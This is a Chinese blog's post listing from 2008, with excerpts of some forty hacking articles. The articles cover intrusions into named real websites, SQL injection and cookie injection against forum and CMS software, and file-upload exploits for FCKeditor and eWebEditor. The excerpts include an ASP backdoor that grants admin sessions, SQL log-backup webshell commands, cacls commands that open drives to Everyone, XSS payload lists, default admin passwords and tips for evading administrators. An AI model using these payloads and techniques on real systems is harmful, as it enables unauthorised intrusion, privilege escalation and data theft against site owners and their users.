自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(55)
  • 收藏
  • 关注

原创 phpwind任意修改管理员密码漏洞

 漏洞说明:PHPWind 论坛系统 是一套采用 php+mysql 数据库方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。但是80sec在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限。漏洞厂商:http://www.phpwind.net漏洞来源:http://www.80s

2008-08-07 15:35:00 2752

原创 Discuz!论坛wap功能模块编码的注射漏洞

作者:冰封浪子由于发在blog上的漏洞资料给一位牛牛搞了.官方已出补丁.(由于 PHP 对 多字节字符集的支持存在问题,在各种编码相互转换过程中,有可能引发程序溢出和程序错误)我很生气(mb日就日.tmd你共享个毛)在这我说下过程:if(defined(IN_DISCUZ)) {exit(Access Denied);}define(CODETABLE_DIR, DISCU

2008-08-07 15:30:00 772

原创 某信息港入侵手记

某日,得一SA注入点,粗略分析,windows 2003系统,支持ASP,不支持ASPX、PHP,SA不能使用xp_cmdshell,其它的一些扩展时,也都返回一个占线错误(第一次见到),用NB得到以下信息。              如果MSSQL没戏的话首先第一个思路就是找后台,看看有没什么直接上传的,在数据库中找到admin表,然后找到adminname adminpass字段,得到

2008-08-07 15:26:00 878

原创 DNS反向查询站点收集整理

http://www.myipneighbors.com/ 貌似还可以查到2级域名http://whois.webhosting.info/http://www.rootkit.net.ru/toolshttp://ip.wen.la

2008-08-04 16:55:00 665

原创 入侵大站的思路

 来源:火狐-步惊云 我搞大站的思路,自己认为比较完整,本想做个动画,可是感觉做起来可能会太长也可能会麻烦重重```这篇文章只是总结下常规思路,没有什么技术含量,如果姐妹有更好的方法和补充,不要保留噢,小心在肚子里长毛噢,嘿嘿``^^首先不知道发在这里对不对哦````如果地方发错了,还麻烦版主转一下,本帖原创注:1.acunetix web vulnerability Scanner 4 简称AC

2008-07-30 21:53:00 567

原创 ewebeditor遍历路径漏洞

 来源:Sebug.net eWebEditor 描述:eWebEditor是一个所见即所得的在线编辑器。顾名思义,就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。ewebeditor/admin_uploadfile.asp过滤不严,造成遍历路径漏洞 测试方法:[警 告]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

2008-07-30 21:52:00 1282

原创 discuz6论坛后台建立WEBSHELL!

 在后台customfaq.lang.php编辑这个文件 可编辑位置处插入,);?>.....然后:customfaq.lang.php提交大马........

2008-07-30 21:52:00 660

原创 利用serv-u拿下网上商城

 文章作者:rabbitsafe信息来源:邪恶八进制信息安全团队(www.eviloctal.com)注:文章已经发表于2006年第8期《黑客手册》,后由原创作者友情提交到邪恶八进制论坛,转载请著名原始出处《黑客手册》。今天,渗透的是一家性用品商城,网站用的全是php程序,对于php构建的系统,一般后台数据库都是mysql,就像asp对应着mssql和一样,由于 php的特性(php默认将传递参数

2008-07-30 21:48:00 746

原创 突破SQL注入限制的一点想法

 作者:A1Pass来源:A1Passs Blog地址:http://a1pass.blog.163.com/ 突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好……经过我的收集,大部分

2008-07-30 21:45:00 521

原创 检测国内大型网游戏交易站

 作者:清雅风萍  来源:火狐我在6月份的时候帮朋友检测了一个国内的游戏币交易网站只要拿到挂马的权限就可以了.在国内也是大大有名的.网址:www.abc.com (真实地址隐藏)ip :221.2.201.165 (真实地址隐藏)网站系统结构:linux+mysql+apache+php 都是慢慢的检测发现的.这是这一个php写的网站.我先用x-scan扫描了它的端口.只开了80 别的都没开.我对

2008-07-30 21:42:00 1165

原创 动网8.0最"新"远程注入漏洞来了

 题目:动网8.0最新远程注入漏洞来了作者:hackest [H.S.T]此文章已发表在《黑客X档案》第9期杂志上,转载请注明出处!话说动网自从8.0版本推出来后,就很少再暴高危漏洞,累得我等菜菜面对动网8.0而束手无策!好在,老天开眼,终于又暴出了一个非常严重的远程注入漏洞,不过只限于SQL版本才有效,Access版本的不受影响。出问题的文件是Appraise.asp,该漏洞允许直接更改管理员密

2008-07-30 21:38:00 904

原创 乔客(joekoe) CMS 4.0 的2个高危漏洞

 1 .上传漏洞:很好利用,把channel变量改一下,只要不等于forum、user.face、blog.logo就行,然后filetype改成asa,就可以光明正大的上传木马了,具体url可以这样common/upload.asp?channel=use2&filetype=asa&filename=&fileinput=u_face&formname=&thumbname=&thumbinp

2008-07-30 21:31:00 781

原创 入侵碧聊后台

 进入聊天室,查看后台管理入口http://空间/后台文件夹/admin.asp下载他数据库吧http://空间/后台文件夹/chatlog.mdb再用数据库浏览器查他的管理用户名及密码就在这了~~~~~~

2008-07-30 21:23:00 648 1

原创 注入三星和重庆人才市场

 大家好 今天给大家做的教程是运用搜索性注入找到网站注入漏洞的方法 我是看了勇哥文章很受启发,想到有时打开网页的时候参数中一般不带有搜索的参数的,怎么办么?手工改造阿。呵呵-----------------------------------------------------------------------一般网站的搜索都是部分匹配的有漏洞的url是http://notebook.samsu

2008-07-30 21:06:00 813

原创 利用WEBSHELL直接进入后台!

首先,我们要上传一个木马,通过下载数据库或者其他方法得到管理员的用户名。然后找到一个ASP文件,在其中的之间加上dim idid=trim(request("qwe"))if id="120" thensession("AdminName")="管理员用户名" end if然后访问的时候在这个ASP文件后面加上?qwe=120然后进入后台页面,是不是直接进去了?不用你输入用户名和口令了吧…………这

2008-07-30 21:03:00 809

原创 Fckeditor <=2.4.2 For php 任意上传文件漏洞

 Infos: Fckeditor Author: Maple-xDate: 18/12/2007FCKeditor是一款非常优秀的HTML在线编辑器。在处理PHP上传的地方存在严重的安全漏洞,导致用户可以上传任意文件在fckeditor/editor/filemanager/upload/php/upload.php 61行$sType = isset( $_GET[Type] ) ?

2008-07-28 21:44:00 725

原创 FCKeditor漏洞利用

 2006-02-09日milw0rm公布了FCKEditor的一个上传漏洞。FCKEditor是一款有多个语言版本的(asp,cgi,aspx,php,cfm,...)的在线编辑的class,很多web系统都使用了这个class。其实这个东西的漏洞,国内早有人挖过,比如asp版(nb文章系统由于使用这个导致的上传漏洞),这里我们看看php版本的:/editor/filemanager/bro

2008-07-28 21:38:00 2239

原创 FCKeditor系统拿webshell

 来源:http://www.secow.com/blog/article.asp?id=254晚上和宝看个台湾的站,后台套用的是FCKeditor的系统.这貌似是个全世界都在用的编辑系统,什么韩国日本台湾美国的站都在用再入侵的时候,宝发现的心得我记录下:http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/bro

2008-07-26 21:28:00 1262

原创 一句话木马中突破〈%%〉标记过滤

 很多时候我们可以通过在注册表单或者用户信息修改表单中,插入简短的ASP代码。使网站ASP数据库变成为一个ASP木马,然后进一步入侵控制服务器。不过在上传代码过程中,许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传。这样就有好多SHELL不能上传上去了。可以采用下面的方法解决。以蓝屏最小ASP木马为例。首先:原程序代码是“", 我们可以把它的标签换下来。然后改成"execute reque

2008-07-26 21:22:00 824

原创 SQL log备份上WEBSHELL总结

 当SQL注入是得到DB权限时候,接下来可以做的工作很多,象找管理员密码,后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲的是log备份,LOG备份出来的小马的体积小,而且备份的成功的可性很大,所以是我作为对DB权限的第一种试探方法.但是在LOG备份中,我们经常会遇到一些很让我们头痛的问题,那就是闭合的问题,我在这里做个总结,也好让我们对不能闭合的方法有一个全面的了解.1.先介绍下LO

2008-07-26 21:16:00 514

原创 ASP.NET备份db日志获得webshell

  alter database pubs set RECOVERY FULLcreate table pubs.dbo.cmd(a image)backup log pubs to disk = c:/TM with initinsert into pubs.dbo.cmd(a) values ( )backup log pubs to disk = d:/haha.aspx这个和a

2008-07-26 21:06:00 478

原创 一些小技巧与常见问题解决方法

  1、当你得到管理员密码却又无法找到后台时不妨试试google。输入site:xxx.com intext:admin        / *意思是查找网址包含xxx.com 文字中包含admin的所有网页*/   或site:xxx.com inurl:admin /* 查询地址中包含admin的链接*/   site:xxx.com intitle:admin /* 查询tittle中包含ad

2008-07-26 21:05:00 1109

原创 BBSXP7 mssql版,从注入到拿WEBSHELL

 BBSXP7 mssql版,从注入到拿WEBSHELL这个东西是去年前发现的了。好象内容细节在哪个杂志上发了。不过似乎杂志和作者都没跟我联系呢?不管,发了再说。针对BBSXP7的,是HTTP头注入。没有多大的看头,熟悉的朋友,请从后面拿SHELL的地方开始看。反正看得懂的就看。看不懂的请提问,不过希望大家问一点有水平的问题。太基础的,GOOGLE上可以搜索到的问题,恕我不回答。我们都知道yuzi

2008-07-26 21:03:00 736

原创 提权整理贴

权限设置cacls.exe c: /e /t /g everyone:F #把c盘设置为everyone可以浏览cacls.exe d: /e /t /g everyone:F #把d盘设置为everyone可以浏览cacls.exe e: /e /t /g everyone:F #把e盘设置为everyone可以浏览cacls.exe f: /e /t /g everyone:F #把f盘设置为

2008-07-26 21:02:00 472

原创 各种网站程序的默认数据库

  动网:默认数据库/data/dvbbs7.mdb备份数据库/databackup/dvbbs7.mdb前台:用户名:admin密 码:admin888 后台:用户名:admin密 码:admin888---------------bbsxp:默认数据库database/bbsxp.mdb_______________LeadBBS默认数据库Data/LeadBBS.mdb用户名: Admin密

2008-07-26 18:17:00 712

原创 三小时拿下东南大学教务处网站

 在学校四年,我都没敢碰这个站,虽然这之间无数的人进来转过圈...毕业都一年了,再也没什么敢不敢的了...晚上正好没站玩,就找这个站练练手...上次跟就业办老师聊天,他说教务处有老师说就业办这个系统安全性差,相比之下教务处就强多了,我听着有点郁闷...但据我所知,教务处网站好像经常被挂马...不管,今天正好有空,试试看...安全性究竟有多强,至少渗透别人的站比渗透自己的站有意思...我

2008-07-26 18:09:00 3713

原创 风讯CMS4.0sp5 商业版的致命伤

 文章作者:oldjun&flyh4t[ 脚本安全小组]信息来源:邪恶八进制信息安全团队(www.eviloctal.com)注意:文章已经发表在《黑客手册》后由作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明出处  FooSunCMS(风讯网站管理系统)是由四川风讯科技发展有限公司自主编写的一套ASP+ACCESS/MSSQL的内容管理系统程序,FoosunCMS已形成内容管理系统整站解

2008-07-26 18:02:00 723

原创 Cookie注入手工检测方法

 例:http://xxxx/view.asp?id=1先访问http://xxxx/view.asp?id=1接着在浏览器里输入:alert(document.cookie="id="+escape("1 and 1=1")) 再访问http://xxxx/view.asp(未出错) 再输入:alert(document.cookie="id="+escape("188 and 1=2")) 再

2008-07-26 17:59:00 832

原创 webshell下查找所有IIS站点配置

 默认IIS站点配置文件有2个MBSchema.xm和MetaBase.xml,路径是C:/WINDOWS/system32/inetsrv/(一般这个目录设置的everyone读的权限.)MetaBase.xml这个文件是存的站点IIS配置的信息.里面可以查到所有本服务器IIS下设置的站点目录和配置。几个主要的配置有:ServerComment:我的网站 //站点的名称ServerBinding

2008-07-26 17:55:00 705

原创 Dvbbs8.2 access/sql 版login.asp远程sql注入

 漏洞描述:中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.aspLogin.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。漏洞等级:高危漏洞分析:password=123123&co

2008-07-26 17:53:00 997

原创 渗透心得之----如何和管理员捉迷藏

 渗透的服务器也多了,起初都是给肉鸡装上鸽子啊,PCSHARE什么的,以为这样就OK了,但是往往到了第二天就不翼而飞,我起初很纳闷,我的后门都是免X的,管理员是怎么样发现我的踪迹的呢?后来慢慢积累了些心得,现发出来跟大家分享一下。 首先,上服务器的第一件事,就是看下文档记录,看下这里都有什么,心中有个数,一会新打开东西要记得在这里删了。有些服务器Run,是空白的,不要在这里输入任何东西,例如CMD

2008-07-26 17:50:00 613

原创 入侵小记

作者:伤心的鱼【IT168 专稿】前言:笔者的一位朋友应聘到一家公司做网管,据说整个机房就他们俩人,工作很轻松。几乎是没什么事做,但是昨天突然给我打电话说是机房被入侵了,被人加了很多用户并且什么cain,arpspoof全都丢到服务器上了,想让笔者帮忙看看是怎么渗透进去的,于是乎在敲诈了一顿烤鸭之后笔者终于出手了。在经过朋友的同意之后特意将本文写出来!一.渗透前的踩点:这哥们也够狠,除了丢给我

2008-07-26 17:45:00 604

原创 DedeCMS 5.1 直接写入马漏洞

最早见于http://groups.google.com/group/ph4nt0m/t/357dbcd7711f1864 经过研究发现。可以很方便的写入一个小马,前提是服务器开放会员系统,而且有图书连载里有类别。 漏洞代码如下: include/inc_bookfunctions.php function WriteBookText($cid,$body) {         global

2008-07-26 16:10:00 1504

原创 Google高级技巧—GooGle Hack

 google hacking其实并算不上什么新东西,当时并没有重视这种技术,认为webshell什么的,并无太大实际用途.google hacking其实并非如此简单... 常用的google关键字: foo1 foo2 (也就是关联,比如搜索xx公司 xx美女) operator:foo filetype:123 类型 site:foo.com 相对直接看网站更有意思,可以得到许多意外的信息

2008-07-25 22:34:00 619

原创 记一次巧妙的hacking

 那天,正在看资料,朋友丢了个URL过来,说是SA注入点,但数据库和WEB分离的,搞了半天没搞定。我一听,SA注入点,应该很容易的说,于是就很随意的说,OK,没问题,等会给结果~手工大概的判断了下,的确是个SA注入点。判断过程偶就不写了,精彩的地方当然要留到后面啦操起NBSI这把大刀就开工了。首先尝试恢复xp_cmdshell和sp_OACreate两扩展存储,恢复后用两扩展存储随意执行了一个

2008-07-25 21:47:00 478

原创 servu.aspx

 @ Page Language="VB" Debug="true" %>@ import Namespace="System.Net.Sockets" %>runat="server">        Love, Where are you ?        Sub BTN_Start_Click(sender As Object, e As EventArgs)        Di

2008-07-25 21:44:00 478

原创 XSS测试语句大全

 >alert(document.cookie) =>script>alert(document.cookie)/script> script>alert(document.cookie)/script> script>alert(vulnerable)/script> %3Cscript%3Ealert(XSS)%3C/script%3E script>alert(XSS

2008-07-25 21:37:00 1432

原创 旁注资料最终版

 旁注是一种思想,一种考虑到管理员的设置和程序的功能缺陷而产生的,不是一种单纯的路线入侵方法,知道没有?!不要整天看着文章去照着路子入侵,这是没有作用的,只是徒劳无功。1. 旁注的条件:(1).主机要可以执行CMD任意命令· 如果主机不能执行CMD任意命令的话,就导致在旁注的过程当中不能进入一些重要的文件夹或者是查看一些服务是否开放,因为木马不是固定死的,如果你们习惯了用其他的木马就需要借助C

2008-07-25 21:35:00 419

原创 SQL注入法攻击一日通

 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。SQL注入是从正常的WWW端口访问,而且表面看起来跟一般

2008-07-25 21:23:00 394

原创 总结asp注入时用到的方法

 1.判断是否有注入 ;and 1=1 ;and 1=2  2.初步判断是否是mssql ;and user>0  3.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select count(*) from msysobjects)>0access  4.注入参数是字符 and [查询条件] and

2008-07-25 21:18:00 416

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除